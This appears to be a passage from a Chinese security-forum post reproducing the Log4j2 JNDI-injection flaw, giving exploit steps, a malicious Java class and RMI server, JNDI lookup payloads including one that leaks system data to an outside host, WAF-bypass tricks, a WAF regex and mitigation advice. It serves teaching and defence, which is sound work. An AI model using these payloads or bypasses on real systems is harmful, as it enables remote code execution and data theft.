  19.             &lt;artifactId&gt;log4j-api&lt;/artifactId&gt;
  20.             &lt;version&gt;2.14.1&lt;/version&gt;
  21.         &lt;/dependency&gt;
  22.     &lt;/dependencies&gt;
  23. &lt;/project&gt;
复制代码

2、main 入口类
  1. import org.apache.logging.log4j.LogManager;
  2. import org.apache.logging.log4j.Logger;
  3. public class log4j {
  4.     private static final Logger logger = LogManager.getLogger(log4j.class);
  5.     public static void main(String[] args) {
  6.         logger.error("${jndi:ldap://127.0.0.1:1389/tsslma}");
  7. }
  8. }
复制代码

多种方法漏洞利用方法一:利用 JNDI 注入器
1、github 下载 jndi 注入器(下载 jar 包即可)
https://github.com/welk1n/JNDI-Injection-Exploit/releases
2、运行 jar 包,开启服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\WinSxS\wow64_microsoft-windows-calc_31bf3856ad364e35_10.0.19041.1_none_6a03b910ee7a4073\calc.exe" -A "127.0.0.1"
参数说明
  •         -c :远程 class 文件中要执行的命令。
  •         -A :服务器地址,可以是 ip 或者域名

注意事项
  •         要确保 1099,1389,8180 端口可用,或下载源码在 run.ServerStart 类 26~28 行更改默认端口,再打包成 jar 包运行
  •         命令会作为参数传入 Runtime.getRuntime().exec(),所以需要确保命令传入 exec() 方法可执行。
  •         bash 等可在 shell 直接执行的相关命令需要加双引号,比如说 java -jar JNDI.jar -C "bash -c ..."

3、根据 cmd 日志拼接 log4j2 打印的日志

由控制台打印的日志可知,jdk1.8 ldap 协议的临时生成的类为 kk1i3g,log4j 日志打印

${jndi:ldap://127.0.0.1:1389/kk1i3g}
4、运行 main 入口类,打印 log4j2 日志,弹出计算器

方法二:根据 jndi 注入原理自己编写
1、在 java 下新建 exp 包
2、在 exp 下新建需要被注入的类
  1. package exp;
  2. import javax.lang.model.element.Name;
  3. import javax.naming.Context;
  4. import java.io.BufferedInputStream;
  5. import java.io.BufferedReader;
  6. import java.io.IOException;
  7. import java.io.InputStreamReader;
  8. import java.util.HashMap;
  9. public class EvilObj {
  10.     public static void exec(String cmd) throws IOException {
  11.         String sb = "";
  12.         BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
  13.         BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
  14.         String lineStr;
  15.         while((lineStr = inBr.readLine()) != null){
  16.             sb += lineStr+"\n";
  17.         }
  18.         inBr.close();
  19.         inBr.close();
  20.     }
  21.     public Object getObjectInstance(Object obj, Name name, Context context, HashMap&lt;?, ?&gt; environment) throws Exception{
  22.         return null;
  23.     }
  24.     static {
  25.         try{
  26.             //需要执行的命令
  27.             exec("C:\\Windows\\WinSxS\\wow64_microsoft-windows-calc_31bf3856ad364e35_10.0.19041.1_none_6a03b910ee7a4073\\calc.exe");
  28.         }catch (Exception e){
  29.             e.printStackTrace();
  30.         }
  31.     }
  32. }
复制代码

3、创建服务类
  1. package exp;
  2. import com.sun.jndi.rmi.registry.ReferenceWrapper;
  3. import javax.naming.NamingException;
  4. import javax.naming.Reference;
  5. import java.rmi.AlreadyBoundException;
  6. import java.rmi.RemoteException;
  7. import java.rmi.registry.LocateRegistry;
  8. import java.rmi.registry.Registry;
  9. public class Server {
  10.     public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
  11.         Registry registry = LocateRegistry.createRegistry(1099);
  12. //        String url = "http://110.40.250.105/jndiRemote/";
  13.         String url = "http://127.0.0.1:6666/";
  14.         System.out.println("Create RMI registry on port 1099");
  15.         Reference reference = new Reference("exp.EvilObj", "exp.EvilObj", url);
  16.         ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
  17.         registry.bind("evil", referenceWrapper);
  18.     }
  19. }
复制代码

加了两个文件的目录结构为:
4、在编译好的 EvilObj 目录下 cmd,执行 python -m http.server 6666 打开 http 服务(在本地其实不打开也访问的到)

5、log4j 的 main 方法打印
logger.error("${jndi:rmi://localhost:1099/evil}");
6、启动 Server,启动 log4j,弹出计算器

方法三:利用 dnslog 检测并外带数据
1、访问 https://log.xn--9tr.com/,点击 Get SubDomain 获取域名(当然也可以选择其他平台,比如 dnslog、ceye 等):

2、拼接日志(将域名加进日志里面)
  1. import org.apache.logging.log4j.LogManager;
  2. import org.apache.logging.log4j.Logger;
  3. public class log4j {
  4.     private static final Logger logger = LogManager.getLogger(log4j.class);
  5.     public static void main(String[] args) {
  6.         logger.error("${jndi:ldap://08dc16c2.dns.1433.eu.org./exp}");
  7. }
  8. }
复制代码

3、直接运行步骤 2 的类,浏览器点击 Refresh Record,在浏览器看到回显
4、外带数据的 payload:

${jndi:ldap://${sys:java.version}.collaborator.com}
可以获取的数据如图:

总结:学习推荐自己实现,不要太依耐工具,实际测试为了效率可以使用工具
对于黑盒测试而言如何发现漏洞
大家都知道存在漏洞是因为在打日志的时候存在问题,所以对于黑盒测试而言,只要是能够被服务端获取且被记录的地方都是可以触发漏洞的,比如 header 中的 Cookie、User-agent 等,post 或者 get 的参数中,url 中等,这种只能盲打,根据返回结果来判断。
检测漏洞项目参考:
https://github.com/takito1812/log4j-detect/blob/main/log4j-detect.py

主要在 header 和 参数中增加 payload 进行漏洞触发,可以结合 dnslog 平台实现自动化漏洞发现,攻击图如下:

对于白盒来说如何发现存在漏洞的系统
白盒相对容易一些,毕竟代码在手,还有什么不知道的,只需要搜索 git 平台的代码,如果符合漏洞版本范围内的都是存在问题的,全部升级替换即可。
下面是火线安全统计的关于存在漏洞组件的库,可以进行搜索,网站:
https://log4j2.huoxian.cn/layout

就是企业越大,系统越多,更新的过程越复杂,需要测试调试的时间越多,尽量避免因为修复漏洞而导致系统故障。
对于该漏洞的临时防护怎么做
如果企业已经部署了 WAF 等安全产品,在漏洞爆发之初就应该及时更新规则,临时处置,从而给后续的根治争取时间,从 payload 上看,有几个关键特征{,jndi,ldap,rmi等,但是如果只是拦截 jndi 等字符串,很可能没有很好的效果,因为可以进行字符串拼接从而绕过检测,而如果拦截 ${,又可能造成正常功能无法使用,毕竟可能存在正常请求中包含这个关键词的情况。
所以在上临时规则时,要先灰度测试一段时间,才可以全量上规则,否则因为一时的防御,而导致新的问题。下面是一个关于 waf 绕过思路,也可以作为防御的参考:
1、jndi、ldap、rmi 绕过
  •         用 lowerCase upperCase 把关键词分割开
  •         如果使用了正则的话可以使用 upper 把 jndı 转成 jndi

案例:

2、${ 关键词拦截(范围大且容易产生误报,且不能真正解决,漏洞的触发点是在打印日志的时候把可控内容携带进去了)
3、为了减少误报,waf 匹配规则参考:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*( ?1)}*|[jndildap|rm)]('|"|`)*}*){9,10}
效果如图:

临时方案治标不治本,只能争取时间,从根源上测地消灭漏洞。
在野利用的案例
随着漏洞的公开,在野利用该漏洞获取权限并进行挖矿勒索的案例已然出现,比如奇安信检测到的情况,详情《警惕!Log4j2漏洞已被多个僵尸网络家族利用》,漏洞触发条件是在 url 中带入 payload:

漏洞利用成功后会加入 SSH 公钥,这个特征还比较明显,容易拦截。比如绿盟科技检测到的情况,详情《Log4j2修补时间差!挖矿软件和僵尸网络乘虚而入》,payload 及利用如图:

我相信,在野利用绝非检测到的这些方式,还有更多想不到的利用方式,这个也会长期存在。
如何修复这个漏洞
漏洞出现之后,官方也一直在推出补丁,然而一直也存在补丁绕过的情况 ,打官方补丁当然是一个比较靠谱的方式,但是一开始并不能完美解决。
在进行漏洞利用时,针对高版本的 java jdk 是无法直接利用的,但是也不一定完全不可以,对于一些企业,定期更新 java 的可能影响比较小,所以 java 版本更新也是一种缓解的方式。
其他层面的修复:
1、采用 rasp 对lookup的调用进行阻断
2、限制不必要的业务访问外网
3、设置 JVM 启动参数 - Dlog4j2.formatMsgNoLookups=true
4、WAF 添加漏洞攻击代码临时拦截规则创建“log4j2.component.properties”文件,文件中增加配置“log4j2.formatMsgNoLookups=true”
写后感
没想到我会因为一句 logger.error 写这么多,其实如果是其它级别的日志只要能打印应该也是可以利用,至于什么级别的打印其实是可以自己配置的,我的第一个 1day 就这样总结完了,感谢良哥,分享了一下 log4j 漏洞成因,说实话那时候看的是有点蒙,点进去像套娃一样。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-30 00:47 , Processed in 0.021508 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表